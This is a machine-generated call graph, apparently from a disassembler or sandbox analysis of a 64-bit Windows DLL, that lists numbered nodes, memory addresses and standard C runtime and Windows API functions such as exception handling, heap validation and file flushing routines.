7fef7533d00 RtlEncodePointer 16287->16302 16289 7fef7537549 _initp_misc_winsig 16303 7fef753cf20 EncodePointer 16289->16303 16291 7fef7533d39 16292 7fef7538fe0 16291->16292 16293 7fef7538ff6 16292->16293 16294 7fef7533d3e 16293->16294 16295 7fef7539022 InitializeCriticalSectionAndSpinCount 16293->16295 16294->16274 16294->16275 16295->16293 16295->16294 16297 7fef7533ead 16296->16297 16304 7fef7539360 LeaveCriticalSection 16297->16304 16299 7fef7533ec7 _updatetlocinfoEx_nolock 16305 7fef7539360 LeaveCriticalSection 16299->16305 16301 7fef7533dce GetCurrentThreadId 16301->16279 16302->16289 16303->16291 16304->16299 16305->16301 17144 7fef753e830 17145 7fef753e857 17144->17145 17148 7fef7543cc0 17145->17148 17149 7fef7543cdd 17148->17149 17150 7fef7543d82 17149->17150 17160 7fef7543ef3 __SehTransFilter 17149->17160 17161 7fef753e8e3 17149->17161 17152 7fef7543dc8 17150->17152 17153 7fef7543e40 17150->17153 17150->17161 17166 7fef7543a60 17152->17166 17154 7fef7543ebd 17153->17154 17158 7fef7543e93 17153->17158 17159 7fef753cf80 _inconsistency 36 API calls 17153->17159 17154->17161 17179 7fef753e790 17154->17179 17164 7fef7544f20 __SehTransFilter 36 API calls 17158->17164 17159->17158 17160->17161 17186 7fef75440b0 17160->17186 17162 7fef7543e08 17172 7fef7544f20 17162->17172 17163 7fef753cf80 _inconsistency 36 API calls 17163->17162 17164->17154 17167 7fef7543a7b 17166->17167 17168 7fef7543a7d 17166->17168 17170 7fef753cf80 _inconsistency 36 API calls 17167->17170 17171 7fef7543aa5 17167->17171 17169 7fef753cf80 _inconsistency 36 API calls 17168->17169 17169->17167 17170->17171 17171->17162 17171->17163 17231 7fef7543b70 17172->17231 17174 7fef7545103 17176 7fef754514a __SetState 17174->17176 17177 7fef753cf80 _inconsistency 36 API calls 17174->17177 17175 7fef753cf80 _inconsistency 36 API calls 17178 7fef7544f55 __SehTransFilter _SetImageBase __SetState 17175->17178 17176->17161 17177->17176 17178->17174 17178->17175 17238 7fef753e500 17179->17238 17182 7fef7543b40 __StateFromControlPc 36 API calls 17183 7fef753e7d0 __SehTransFilter 17182->17183 17184 7fef7544f20 __SehTransFilter 36 API calls 17183->17184 17185 7fef753e81e 17184->17185 17185->17161 17187 7fef7543b40 __StateFromControlPc 36 API calls 17186->17187 17188 7fef75440ea 17187->17188 17189 7fef753e500 __GetUnwindTryBlock 37 API calls 17188->17189 17190 7fef7544110 17189->17190 17243 7fef7543c70 17190->17243 17193 7fef7544133 __SetState 17246 7fef7543c00 17193->17246 17194 7fef7544176 17195 7fef7543c70 __GetUnwindTryBlock 37 API calls 17194->17195 17196 7fef7544174 17195->17196 17198 7fef753cf80 _inconsistency 36 API calls 17196->17198 17199 7fef75441af _ValidateRead _SetThrowImageBase 17196->17199 17198->17199 17201 7fef7544347 17199->17201 17207 7fef7544235 17199->17207 17215 7fef753cf80 _inconsistency 36 API calls 17199->17215 17218 7fef754428e 17199->17218 17200 7fef75447d9 17202 7fef75447f3 17200->17202 17203 7fef7544847 17200->17203 17208 7fef75447d7 17200->17208 17201->17200 17204 7fef75443f5 17201->17204 17276 7fef7544960 17202->17276 17206 7fef753cf50 terminate 35 API calls 17203->17206 17211 7fef754466c __SehTransFilter 17204->17211 17261 7fef753ea30 17204->17261 17206->17208 17207->17161 17208->17207 17210 7fef753cf80 _inconsistency 36 API calls 17208->17210 17210->17207 17211->17208 17212 7fef7545bb0 __SehTransFilter 36 API calls 17211->17212 17213 7fef7544727 17212->17213 17213->17208 17214 7fef753e500 __GetUnwindTryBlock 37 API calls 17213->17214 17216 7fef7544767 17214->17216 17215->17218 17273 7fef753edc0 RtlUnwindEx 17216->17273 17219 7fef753cf80 _inconsistency 36 API calls 17218->17219 17220 7fef75442fa 17218->17220 17219->17220 17220->17201 17249 7fef7545bb0 17220->17249 17221 7fef7544450 __SehTransFilter 17221->17211 17266 7fef7545180 17221->17266 17224 7fef7544340 __SehTransFilter 17224->17201 17225 7fef7544393 17224->17225 17226 7fef754435a __SehTransFilter 17224->17226 17227 7fef753cf50 terminate 35 API calls 17225->17227 17255 7fef7544870 17226->17255 17227->17201 17232 7fef7543b9a 17231->17232 17234 7fef7543ba9 17231->17234 17235 7fef7543b40 17232->17235 17234->17178 17236 7fef7543a60 __StateFromControlPc 36 API calls 17235->17236 17237 7fef7543b65 17236->17237 17237->17234 17239 7fef7543b40 __StateFromControlPc 36 API calls 17238->17239 17240 7fef753e539 17239->17240 17241 7fef753e5c2 RtlLookupFunctionEntry 17240->17241 17242 7fef753e601 17240->17242 17241->17242 17242->17182 17244 7fef753e500 __GetUnwindTryBlock 37 API calls 17243->17244 17245 7fef7543c9c 17244->17245 17245->17193 17245->17194 17247 7fef753e500 __GetUnwindTryBlock 37 API calls 17246->17247 17248 7fef7543c31 17247->17248 17248->17196 17250 7fef7545bc6 17249->17250 17251 7fef7545bc8 17249->17251 17253 7fef753cf50 terminate 35 API calls 17250->17253 17254 7fef7545bda __SehTransFilter 17250->17254 17252 7fef753cf80 _inconsistency 36 API calls 17251->17252 17252->17250 17253->17254 17254->17224 17286 7fef754d4e0 17255->17286 17258 7fef754d320 17260 7fef754d375 17258->17260 17259 7fef754d3ba RaiseException 17259->17201 17260->17259 17262 7fef7543b40 __StateFromControlPc 36 API calls 17261->17262 17263 7fef753ea6f 17262->17263 17264 7fef753cf80 _inconsistency 36 API calls 17263->17264 17265 7fef753ea7a 17263->17265 17264->17265 17265->17221 17267 7fef753e500 __GetUnwindTryBlock 37 API calls 17266->17267 17268 7fef75451c1 17267->17268 17270 7fef75451f0 __SehTransFilter 17268->17270 17293 7fef7545970 17268->17293 17271 7fef753edc0 __SehTransFilter 9 API calls 17270->17271 17272 7fef7545259 17271->17272 17272->17221 17274 7fef7533280 __GSHandlerCheck 8 API calls 17273->17274 17275 7fef753eee7 17274->17275 17275->17208 17278 7fef7544990 17276->17278 17283 7fef754498b 17276->17283 17277 7fef75449b2 __SehTransFilter 17279 7fef7544a41 17277->17279 17280 7fef753cf80 _inconsistency 36 API calls 17277->17280 17277->17283 17278->17277 17310 7fef7533d00 RtlEncodePointer 17278->17310 17281 7fef753ea30 __SehTransFilter 36 API calls 17279->17281 17280->17279 17284 7fef7544a8e __SehTransFilter 17281->17284 17283->17208 17284->17283 17285 7fef7545180 __SehTransFilter 38 API calls 17284->17285 17285->17283 17289 7fef754d660 17286->17289 17290 7fef754437d 17289->17290 17291 7fef754d676 std::exception::_Copy_str malloc 17289->17291 17290->17258 17291->17290 17292 7fef753d490 std::exception::_Copy_str 17 API calls 17291->17292 17292->17290 17294 7fef7545998 17293->17294 17297 7fef75455f0 17294->17297 17296 7fef75459d3 __SehTransFilter __AdjustPointer 17296->17270 17298 7fef754561e __SehTransFilter 17297->17298 17299 7fef7545765 17298->17299 17300 7fef75456fa _ValidateRead 17298->17300 17308 7fef75456aa __SehTransFilter __AdjustPointer 17298->17308 17301 7fef754577a _ValidateRead 17299->17301 17302 7fef7545813 __SehTransFilter 17299->17302 17303 7fef753cf80 _inconsistency 36 API calls 17300->17303 17300->17308 17304 7fef753cf80 _inconsistency 36 API calls 17301->17304 17301->17308 17305 7fef754584d _ValidateRead 17302->17305 17309 7fef75458c6 __SehTransFilter _ValidateExecute _ValidateRead 17302->17309 17303->17308 17304->17308 17306 7fef753cf80 _inconsistency 36 API calls 17305->17306 17305->17308 17306->17308 17307 7fef753cf80 _inconsistency 36 API calls 17307->17308 17308->17296 17309->17307 17309->17308 17310->17277 18732 7fef7533130 18733 7fef7533170 __GSHandlerCheck 8 API calls 18732->18733 18734 7fef7533160 18733->18734 17311 7fef754d830 17312 7fef754d8aa 17311->17312 17313 7fef754d926 17312->17313 17315 7fef754d97b 17312->17315 17314 7fef753bd70 _invalid_parameter 17 API calls 17313->17314 17318 7fef754d95a _LocaleUpdate::~_LocaleUpdate 17314->17318 17316 7fef754d9ee 17315->17316 17322 7fef754da43 17315->17322 17317 7fef753bd70 _invalid_parameter 17 API calls 17316->17317 17317->17318 17319 7fef7533280 __GSHandlerCheck 8 API calls 17318->17319 17320 7fef754ed9e 17319->17320 17321 7fef754eca1 17321->17318 17323 7fef753bd70 _invalid_parameter 17 API calls 17321->17323 17322->17321 17324 7fef754dbb5 17322->17324 17323->17318 17325 7fef753bd70 _invalid_parameter 17 API calls 17324->17325 17325->17318 18426 7fef7543e3b 18427 7fef7543ec7 18426->18427 18428 7fef753e790 __SehTransFilter 37 API calls 18427->18428 18429 7fef7543ee4 18428->18429 17326 7fef753443c 17327 7fef753444c 17326->17327 17330 7fef7539360 LeaveCriticalSection 17327->17330 17329 7fef75348be 17330->17329 18744 7fef7549939 18745 7fef7549951 __doserrno 18744->18745 18746 7fef753bd70 _invalid_parameter 17 API calls 18745->18746 18747 7fef75499d7 18746->18747 18748 7fef7533280 __GSHandlerCheck 8 API calls 18747->18748 18749 7fef754a9f5 18748->18749 17331 7fef754e424 17332 7fef754e469 _CrtMemDumpAllObjectsSince 17331->17332 17333 7fef754e588 DecodePointer 17332->17333 17334 7fef754e5fd _CrtMemDumpAllObjectsSince 17333->17334 17335 7fef754e61b DecodePointer 17334->17335 17336 7fef754e642 _CrtMemDumpAllObjectsSince 17334->17336 17335->17336 17337 7fef754e666 DecodePointer 17336->17337 17339 7fef754e68d std::exception::_Copy_str 17336->17339 17337->17339 17338 7fef754eadf 17341 7fef754ef10 25 API calls 17338->17341 17339->17338 17340 7fef754eec0 25 API calls 17339->17340 17347 7fef754da75 17339->17347 17340->17338 17342 7fef754eafd 17341->17342 17343 7fef754eb33 17342->17343 17345 7fef754eec0 25 API calls 17342->17345 17344 7fef754ec29 17343->17344 17358 7fef754eb49 _CrtMemDumpAllObjectsSince 17343->17358 17346 7fef754ef10 25 API calls 17344->17346 17345->17343 17348 7fef754ebda 17346->17348 17349 7fef754eca1 17347->17349 17352 7fef754dbb5 17347->17352 17348->17347 17353 7fef754eec0 25 API calls 17348->17353 17350 7fef753bd70 _invalid_parameter 17 API calls 17349->17350 17354 7fef754dbe9 _LocaleUpdate::~_LocaleUpdate 17349->17354 17350->17354 17351 7fef7533280 __GSHandlerCheck 8 API calls 17355 7fef754ed9e 17351->17355 17356 7fef753bd70 _invalid_parameter 17 API calls 17352->17356 17353->17347 17354->17351 17356->17354 17357 7fef754f000 wcsxfrm 2 API calls 17357->17358 17358->17348 17358->17357 17359 7fef754ee40 25 API calls 17358->17359 17359->17358 18430 7fef7535a25 18431 7fef7535a37 18430->18431 18432 7fef753bd70 _invalid_parameter 17 API calls 18431->18432 18433 7fef7535aaf 18432->18433 18761 7fef7544920 18764 7fef754d530 18761->18764 18767 7fef754d580 18764->18767 18768 7fef754d59a std::exception::_Tidy 18767->18768 18769 7fef754493d 18767->18769 18768->18769 18770 7fef754d660 std::exception::_Copy_str 17 API calls 18768->18770 18770->18769 18771 7fef753b12b 18772 7fef753b14c 18771->18772 18774 7fef753b2e0 18772->18774 18775 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 18772->18775 18773 7fef753b33e 18777 7fef7540cc0 25 API calls 18773->18777 18774->18773 18776 7fef753d490 std::exception::_Copy_str 17 API calls 18774->18776 18775->18774 18778 7fef753b311 18776->18778 18779 7fef753b358 18777->18779 18780 7fef7537ff0 _invoke_watson_if_error 16 API calls 18778->18780 18781 7fef753b37d 18779->18781 18782 7fef753cff0 terminate 34 API calls 18779->18782 18780->18773 18785 7fef7533280 __GSHandlerCheck 8 API calls 18781->18785 18783 7fef753b373 18782->18783 18784 7fef7537090 _exit 33 API calls 18783->18784 18784->18781 18786 7fef753b3a0 18785->18786 17785 7fef754ff2d 17786 7fef754ff37 17785->17786 17787 7fef7550042 17786->17787 17788 7fef754ff47 17786->17788 17813 7fef7539360 LeaveCriticalSection 17787->17813 17789 7fef755003d 17788->17789 17800 7fef754ae90 17788->17800 17791 7fef755004c 17793 7fef754ff97 17794 7fef754ffd0 17793->17794 17796 7fef754ffe1 17793->17796 17797 7fef754ffbb 17793->17797 17795 7fef754af60 _unlock_file2 2 API calls 17794->17795 17795->17789 17796->17794 17799 7fef754fd70 _fflush_nolock 25 API calls 17796->17799 17803 7fef754fd70 17797->17803 17799->17794 17801 7fef754aec8 EnterCriticalSection 17800->17801 17802 7fef754aea4 17800->17802 17801->17802 17802->17793 17804 7fef754fd81 17803->17804 17805 7fef754fd8a 17803->17805 17814 7fef754ff00 17804->17814 17829 7fef754fdf0 17805->17829 17808 7fef754fd94 17809 7fef754afb0 _fflush_nolock 17 API calls 17808->17809 17812 7fef754fd88 17808->17812 17810 7fef754fdba 17809->17810 17833 7fef75507c0 17810->17833 17812->17794 17813->17791 17815 7fef754ff22 17814->17815 17816 7fef7550042 17815->17816 17817 7fef754ff47 17815->17817 17849 7fef7539360 LeaveCriticalSection 17816->17849 17818 7fef755003d 17817->17818 17821 7fef754ae90 _lock_file2 EnterCriticalSection 17817->17821 17818->17812 17820 7fef755004c 17820->17812 17822 7fef754ff97 17821->17822 17824 7fef754ffe1 17822->17824 17825 7fef754ffbb 17822->17825 17828 7fef754ffd0 17822->17828 17823 7fef754af60 _unlock_file2 2 API calls 17823->17818 17827 7fef754fd70 _fflush_nolock 25 API calls 17824->17827 17824->17828 17826 7fef754fd70 _fflush_nolock 25 API calls 17825->17826 17826->17828 17827->17828 17828->17823 17830 7fef754fe1f 17829->17830 17832 7fef754fe5d 17829->17832 17831 7fef754afb0 _fflush_nolock 17 API calls 17830->17831 17830->17832 17831->17832 17832->17808 17834 7fef75507e8 17833->17834 17835 7fef75507d3 17833->17835 17836 7fef7550851 17834->17836 17841 7fef755088f 17834->17841 17835->17812 17837 7fef753bd70 _invalid_parameter 17 API calls 17836->17837 17837->17835 17838 7fef7550913 17843 7fef753bd70 _invalid_parameter 17 API calls 17838->17843 17839 7fef7550951 17840 7fef754fae0 _fflush_nolock 3 API calls 17839->17840 17842 7fef755095a 17840->17842 17841->17838 17841->17839 17844 7fef754f900 _fflush_nolock 17 API calls 17842->17844 17848 7fef75509ab __doserrno 17842->17848 17843->17835 17845 7fef7550992 FlushFileBuffers 17844->17845 17846 7fef755099f GetLastError 17845->17846 17845->17848 17846->17848 17850 7fef754fbc0 LeaveCriticalSection 17848->17850 17849->17820 17850->17835 17851 7fef7539328 17852 7fef753932c 17851->17852 17853 7fef7539336 EnterCriticalSection 17851->17853 17852->17853 18791 7fef75334d5 18792 7fef75334da _calloc_dbg 18791->18792 18793 7fef753350b FlsSetValue 18792->18793 18794 7fef7533548 18792->18794 18793->18794 18795 7fef7533520 18793->18795 18796 7fef7533e30 LeaveCriticalSection 18795->18796 18797 7fef753352c GetCurrentThreadId 18796->18797 18797->18794 17854 7fef75366da 17855 7fef7536725 17854->17855 17856 7fef7536745 17854->17856 17855->17856 17860 7fef7539a70 17855->17860 17857 7fef753677f 17856->17857 17859 7fef7539b10 __updatetmbcinfo LeaveCriticalSection 17856->17859 17859->17857 17862 7fef7539a79 _updatetlocinfoEx_nolock 17860->17862 17861 7fef7539ad8 17861->17856 17862->17861 17864 7fef7539360 LeaveCriticalSection 17862->17864 17864->17861 17360 7fef75333d6 17363 7fef75388d0 HeapDestroy 17360->17363 17362 7fef75333db 17363->17362 17876 7fef7535ad9 17877 7fef7535add 17876->17877 17878 7fef7536380 _CrtIsValidHeapPointer HeapValidate 17877->17878 17879 7fef7535b3a 17878->17879 17882 7fef7539360 LeaveCriticalSection 17879->17882 17881 7fef7535c14 17882->17881 18798 7fef75368c4 18799 7fef75368d1 18798->18799 18800 7fef7536ba6 18799->18800 18802 7fef75368ed _CrtIsValidPointer 18799->18802 18816 7fef7539360 LeaveCriticalSection 18800->18816 18804 7fef753695e IsBadReadPtr 18802->18804 18806 7fef7536976 18802->18806 18814 7fef753692f 18802->18814 18803 7fef7536bb0 18804->18806 18805 7fef7536ad2 18810 7fef7536b2d 18805->18810 18811 7fef7536add 18805->18811 18806->18805 18807 7fef7536a29 18806->18807 18808 7fef7536abe 18807->18808 18809 7fef7536a86 IsBadReadPtr 18807->18809 18813 7fef7536bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18808->18813 18809->18808 18809->18814 18810->18814 18815 7fef7536bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18810->18815 18812 7fef7536bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18811->18812 18812->18814 18813->18814 18815->18814 18816->18803 17887 7fef75476c0 17888 7fef7547be3 _CrtMemDumpAllObjectsSince 17887->17888 17889 7fef75476cf _CrtMemDumpAllObjectsSince 17887->17889 17890 7fef7547cc6 WideCharToMultiByte 17888->17890 17900 7fef75476e6 _LocaleUpdate::~_LocaleUpdate 17888->17900 17891 7fef7547905 _CrtMemDumpAllObjectsSince 17889->17891 17892 7fef75477f5 _CrtMemDumpAllObjectsSince wcsncnt 17889->17892 17889->17900 17890->17900 17894 7fef754790f WideCharToMultiByte 17891->17894 17897 7fef7547827 WideCharToMultiByte 17892->17897 17893 7fef7533280 __GSHandlerCheck 8 API calls 17895 7fef7547d85 17893->17895 17896 7fef7547965 17894->17896 17898 7fef754799a GetLastError 17896->17898 17896->17900 17897->17900 17898->17900 17901 7fef75479d3 _CrtMemDumpAllObjectsSince 17898->17901 17899 7fef7547a05 WideCharToMultiByte 17899->17900 17899->17901 17900->17893 17901->17899 17901->17900 16228 7fef7536ff2 16229 7fef7536ffe 16228->16229 16232 7fef753ca00 16229->16232 16231 7fef7537011 _initterm_e 16233 7fef753ca0e 16232->16233 16234 7fef753ca23 EncodePointer 16233->16234 16235 7fef753ca4b 16233->16235 16234->16233 16235->16231 17376 7fef753f7f1 17377 7fef753f80d 17376->17377 17397 7fef753f8de _wcsftime_l 17376->17397 17433 7fef7546fb0 17377->17433 17379 7fef753fa70 17440 7fef75469c0 17379->17440 17382 7fef7537ff0 _invoke_watson_if_error 16 API calls 17385 7fef753f85a OutputDebugStringA 17382->17385 17383 7fef753fa8a 17387 7fef7537ff0 _invoke_watson_if_error 16 API calls 17383->17387 17384 7fef753f9f4 17384->17379 17388 7fef753d490 std::exception::_Copy_str 17 API calls 17384->17388 17386 7fef753f872 OutputDebugStringA OutputDebugStringA OutputDebugStringA OutputDebugStringA 17385->17386 17392 7fef753f8ce 17386->17392 17390 7fef753fab7 17387->17390 17391 7fef753fa43 17388->17391 17394 7fef753fb24 17390->17394 17395 7fef75469c0 17 API calls 17390->17395 17409 7fef753fb6a 17390->17409 17393 7fef7537ff0 _invoke_watson_if_error 16 API calls 17391->17393 17404 7fef7533280 __GSHandlerCheck 8 API calls 17392->17404 17393->17379 17396 7fef75469c0 17 API calls 17394->17396 17398 7fef753faf7 17395->17398 17399 7fef753fb3d 17396->17399 17397->17384 17400 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 17397->17400 17401 7fef753f996 17397->17401 17402 7fef7537ff0 _invoke_watson_if_error 16 API calls 17398->17402 17403 7fef7537ff0 _invoke_watson_if_error 16 API calls 17399->17403 17400->17401 17401->17384 17405 7fef753d490 std::exception::_Copy_str 17 API calls 17401->17405 17402->17394 17403->17409 17406 7fef754011d 17404->17406 17407 7fef753f9c7 17405->17407 17408 7fef7537ff0 _invoke_watson_if_error 16 API calls 17407->17408 17408->17384 17410 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 17409->17410 17411 7fef753fc39 17409->17411 17410->17411 17412 7fef753fc97 17411->17412 17413 7fef753d490 std::exception::_Copy_str 17 API calls 17411->17413 17453 7fef7546970 17412->17453 17415 7fef753fc6a 17413->17415 17416 7fef7537ff0 _invoke_watson_if_error 16 API calls 17415->17416 17416->17412 17418 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 17419 7fef753fd6e 17418->17419 17420 7fef7541640 17 API calls 17419->17420 17423 7fef753fdbb 17419->17423 17421 7fef753fd8e 17420->17421 17422 7fef7537ff0 _invoke_watson_if_error 16 API calls 17421->17422 17422->17423 17428 7fef753ff03 std::exception::_Copy_str 17423->17428 17456 7fef7539360 LeaveCriticalSection 17423->17456 17424 7fef753ffef 17426 7fef7540016 17424->17426 17427 7fef7540008 OutputDebugStringA 17424->17427 17426->17392 17430 7fef7546fb0 _itow_s 17 API calls 17426->17430 17427->17426 17428->17392 17428->17424 17429 7fef753ffaa WriteFile 17428->17429 17429->17424 17431 7fef7540065 17430->17431 17432 7fef7537ff0 _invoke_watson_if_error 16 API calls 17431->17432 17432->17392 17434 7fef7547003 17433->17434 17435 7fef7546fd6 17433->17435 17437 7fef7547030 _itow_s 17 API calls 17434->17437 17435->17434 17436 7fef7546fdd 17435->17436 17457 7fef7547030 17436->17457 17439 7fef753f82d 17437->17439 17439->17382 17441 7fef75469e1 17440->17441 17442 7fef7546a42 17441->17442 17444 7fef7546a80 _calloc_dbg_impl 17441->17444 17443 7fef753bd70 _invalid_parameter 17 API calls 17442->17443 17446 7fef7546a76 _calloc_dbg_impl 17443->17446 17445 7fef7546b6e 17444->17445 17447 7fef7546bac _calloc_dbg_impl 17444->17447 17449 7fef753bd70 _invalid_parameter 17 API calls 17445->17449 17446->17383 17448 7fef7546d26 _calloc_dbg_impl 17447->17448 17450 7fef7546ce8 17447->17450 17448->17446 17452 7fef753bd70 _invalid_parameter 17 API calls 17448->17452 17449->17446 17451 7fef753bd70 _invalid_parameter 17 API calls 17450->17451 17451->17446 17452->17446 17473 7fef75463e0 17453->17473 17455 7fef753fd20 17455->17418 17456->17428 17459 7fef7547055 17457->17459 17458 7fef75470ab 17460 7fef753bd70 _invalid_parameter 17 API calls 17458->17460 17459->17458 17461 7fef75470e9 17459->17461 17470 7fef75470df 17460->17470 17462 7fef754714a 17461->17462 17464 7fef7547188 _calloc_dbg_impl 17461->17464 17463 7fef753bd70 _invalid_parameter 17 API calls 17462->17463 17463->17470 17465 7fef7547287 17464->17465 17468 7fef75472c5 17464->17468 17466 7fef753bd70 _invalid_parameter 17 API calls 17465->17466 17466->17470 17467 7fef7547338 17469 7fef753bd70 _invalid_parameter 17 API calls 17467->17469 17468->17467 17471 7fef7547376 17468->17471 17469->17470 17470->17439 17471->17470 17472 7fef753bd70 _invalid_parameter 17 API calls 17471->17472 17472->17470 17474 7fef754640e 17473->17474 17475 7fef754648e 17474->17475 17477 7fef75464cc _calloc_dbg_impl 17474->17477 17476 7fef753bd70 _invalid_parameter 17 API calls 17475->17476 17484 7fef75464c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 17476->17484 17478 7fef754663f 17477->17478 17479 7fef754668e _CrtMemDumpAllObjectsSince 17477->17479 17480 7fef753bd70 _invalid_parameter 17 API calls 17478->17480 17485 7fef7545ea0 17479->17485 17480->17484 17482 7fef75466b5 _calloc_dbg_impl 17483 7fef753bd70 _invalid_parameter 17 API calls 17482->17483 17482->17484 17483->17484 17484->17455 17486 7fef7545ecf 17485->17486 17487 7fef7545fae 17486->17487 17488 7fef7545f6e 17486->17488 17497 7fef7545eda std::exception::_Copy_str _LocaleUpdate::~_LocaleUpdate 17486->17497 17490 7fef7545fcf _CrtMemDumpAllObjectsSince 17487->17490 17491 7fef75462e1 _CrtMemDumpAllObjectsSince 17487->17491 17489 7fef753bd70 _invalid_parameter 17 API calls 17488->17489 17489->17497 17492 7fef75460a1 MultiByteToWideChar 17490->17492 17490->17497 17493 7fef754632f MultiByteToWideChar 17491->17493 17491->17497 17494 7fef754610e GetLastError 17492->17494 17492->17497 17493->17497 17496 7fef7546154 _CrtMemDumpAllObjectsSince wcsxfrm 17494->17496 17494->17497 17495 7fef7546238 MultiByteToWideChar 17495->17497 17496->17495 17496->17497 17497->17482 17498 7fef75353fb 17499 7fef753541d _realloc_dbg 17498->17499 17501 7fef7535421 17499->17501 17504 7fef7536380 17499->17504 17502 7fef75354de _calloc_dbg_impl _realloc_dbg 17508 7fef753c020 17502->17508 17505 7fef7536395 _CrtIsValidPointer 17504->17505 17506 7fef7536391 17504->17506 17505->17506 17507 7fef75363b6 HeapValidate 17505->17507 17506->17502 17507->17506 17509 7fef753c03b HeapFree 17508->17509 17510 7fef753c039 _get_errno_from_oserr 17508->17510 17509->17510 17511 7fef753c05a GetLastError 17509->17511 17510->17501 17511->17510 17940 7fef754e2fc 17941 7fef754e309 get_int64_arg _get_printf_count_output 17940->17941 17942 7fef754e38c 17941->17942 17944 7fef754e3e1 17941->17944 17947 7fef753bd70 _invalid_parameter 17 API calls 17942->17947 17943 7fef754eadf 17946 7fef754ef10 25 API calls 17943->17946 17944->17943 17945 7fef754eec0 25 API calls 17944->17945 17955 7fef754da75 17944->17955 17945->17943 17948 7fef754eafd 17946->17948 17953 7fef754dbe9 _LocaleUpdate::~_LocaleUpdate 17947->17953 17949 7fef754eb33 17948->17949 17951 7fef754eec0 25 API calls 17948->17951 17950 7fef754ec29 17949->17950 17964 7fef754eb49 _CrtMemDumpAllObjectsSince 17949->17964 17952 7fef754ef10 25 API calls 17950->17952 17951->17949 17956 7fef754ebda 17952->17956 17954 7fef7533280 __GSHandlerCheck 8 API calls 17953->17954 17957 7fef754ed9e 17954->17957 17958 7fef754eca1 17955->17958 17960 7fef754dbb5 17955->17960 17956->17955 17961 7fef754eec0 25 API calls 17956->17961 17958->17953 17959 7fef753bd70 _invalid_parameter 17 API calls 17958->17959 17959->17953 17962 7fef753bd70 _invalid_parameter 17 API calls 17960->17962 17961->17955 17962->17953 17963 7fef754f000 wcsxfrm 2 API calls 17963->17964 17964->17956 17964->17963 17965 7fef754ee40 25 API calls 17964->17965 17965->17964 17977 7fef75412e3 LoadLibraryW 17978 7fef7541304 GetProcAddress 17977->17978 17987 7fef75412fd 17977->17987 17979 7fef754132a 7 API calls 17978->17979 17978->17987 17980 7fef75413b3 GetProcAddress EncodePointer 17979->17980 17981 7fef75413d5 17979->17981 17980->17981 17983 7fef7541428 DecodePointer 17981->17983 17985 7fef75413f9 DecodePointer DecodePointer 17981->17985 17982 7fef7533280 __GSHandlerCheck 8 API calls 17984 7fef754157a 17982->17984 17983->17987 17985->17983 17987->17982 17988 7fef7537ae3 17991 7fef7537af3 17988->17991 17989 7fef7537ce0 SetHandleCount 17990 7fef7537c74 17989->17990 17991->17989 17992 7fef7537b95 GetStdHandle 17991->17992 17993 7fef7537c7b 17991->17993 17992->17993 17994 7fef7537bb9 17992->17994 17993->17989 17994->17993 17995 7fef7537bc8 GetFileType 17994->17995 17995->17993 17996 7fef7537beb InitializeCriticalSectionAndSpinCount 17995->17996 17996->17990 17996->17993 18834 7fef75444e5 18839 7fef754445a __SehTransFilter 18834->18839 18835 7fef75447d7 18836 7fef754485b 18835->18836 18837 7fef753cf80 _inconsistency 36 API calls 18835->18837 18837->18836 18838 7fef754466c __SehTransFilter 18838->18835 18840 7fef7545bb0 __SehTransFilter 36 API calls 18838->18840 18839->18838 18841 7fef7545180 __SehTransFilter 38 API calls 18839->18841 18842 7fef7544727 18840->18842 18841->18839 18842->18835 18843 7fef753e500 __GetUnwindTryBlock 37 API calls 18842->18843 18844 7fef7544767 18843->18844 18845 7fef753edc0 __SehTransFilter 9 API calls 18844->18845 18845->18835 17515 7fef75513e0 17518 7fef754aee0 17515->17518 17519 7fef754af47 LeaveCriticalSection 17518->17519 17520 7fef754aef7 17518->17520 17522 7fef754af45 17519->17522 17520->17519 17521 7fef754af0b 17520->17521 17524 7fef7539360 LeaveCriticalSection 17521->17524 17524->17522 17525 7fef754bfde 17535 7fef754c00c 17525->17535 17526 7fef754b99c 17527 7fef754cc93 17526->17527 17530 7fef754bada 17526->17530 17529 7fef753bd70 _invalid_parameter 17 API calls 17527->17529 17532 7fef754bb0e _LocaleUpdate::~_LocaleUpdate 17527->17532 17528 7fef754b530 wctomb_s 19 API calls 17528->17535 17529->17532 17534 7fef753bd70 _invalid_parameter 17 API calls 17530->17534 17531 7fef7533280 __GSHandlerCheck 8 API calls 17533 7fef754cd90 17531->17533 17532->17531 17534->17532 17535->17526 17535->17528 16564 7fef7537de0 16565 7fef7537ded 16564->16565 16569 7fef7537df2 std::exception::_Copy_str _calloc_dbg 16564->16569 16571 7fef753aa40 16565->16571 16567 7fef7537e0e 16569->16567 16575 7fef753d490 16569->16575 16585 7fef7537ff0 16569->16585 16572 7fef753aa57 16571->16572 16573 7fef753aa4d 16571->16573 16572->16569 16589 7fef7539c10 16573->16589 16576 7fef753d4b1 16575->16576 16577 7fef753d512 16576->16577 16579 7fef753d550 _calloc_dbg_impl 16576->16579 16578 7fef753bd70 _invalid_parameter 17 API calls 16577->16578 16581 7fef753d546 _calloc_dbg_impl 16578->16581 16580 7fef753d63e 16579->16580 16583 7fef753d67c _calloc_dbg_impl 16579->16583 16582 7fef753bd70 _invalid_parameter 17 API calls 16580->16582 16581->16569 16582->16581 16583->16581 16584 7fef753bd70 _invalid_parameter 17 API calls 16583->16584 16584->16581 16586 7fef753800e 16585->16586 16587 7fef7538010 16585->16587 16586->16569 16588 7fef753be00 _invalid_parameter 16 API calls 16587->16588 16588->16586 16590 7fef7539c2a 16589->16590 16599 7fef7539b10 16590->16599 16592 7fef7539c34 16603 7fef7539f20 16592->16603 16594 7fef7539c51 16596 7fef7539ecd 16594->16596 16609 7fef753a000 16594->16609 16596->16572 16597 7fef7539ce8 16597->16596 16622 7fef7539360 LeaveCriticalSection 16597->16622 16600 7fef7539b19 16599->16600 16602 7fef7539bde 16600->16602 16623 7fef7539360 LeaveCriticalSection 16600->16623 16602->16592 16604 7fef7539f49 16603->16604 16605 7fef7539f81 16604->16605 16606 7fef7539f5b GetOEMCP 16604->16606 16607 7fef7539f79 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16605->16607 16608 7fef7539f88 GetACP 16605->16608 16606->16607 16607->16594 16608->16607 16610 7fef7539f20 __initmbctable 2 API calls 16609->16610 